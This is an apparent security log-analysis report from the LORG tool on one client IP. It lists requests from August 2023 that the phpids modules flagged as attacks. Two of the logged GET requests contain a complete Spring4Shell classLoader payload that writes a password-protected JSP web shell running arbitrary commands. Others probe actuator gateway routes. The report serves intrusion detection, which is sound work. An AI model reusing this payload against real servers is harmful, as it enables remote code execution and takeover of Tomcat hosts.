LORG Detection Results [lorg]

Summary: 2 incidents discovered from one client

regular visitor

185.207.250.115 | 2 incidents | impact ∑: 76

attacks only

Description: A human attacker yesterday. A total of 2 incidents where discovered by phpids detection modules.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	-	185.207.250.115	-	-	Sun, 27 Aug 2023 00:47:11 +0200	POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1	302	529	-	Custom-HttpClient
38	xss csrf id rfe lfi	-	185.207.250.115	-	-	Sun, 27 Aug 2023 00:47:11 +0200	GET /functionRouter/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1	302	2031	-	Custom-HttpClient
0	none	-	185.207.250.115	-	-	Sun, 27 Aug 2023 19:55:17 +0200	POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1	302	529	-	Custom-HttpClient
0	none	-	185.207.250.115	-	-	Sun, 27 Aug 2023 19:55:17 +0200	POST /functionRouter HTTP/1.1	302	486	-	Custom-HttpClient
38	xss csrf id rfe lfi	-	185.207.250.115	-	-	Sun, 27 Aug 2023 19:55:17 +0200	GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1	302	2000	-	Custom-HttpClient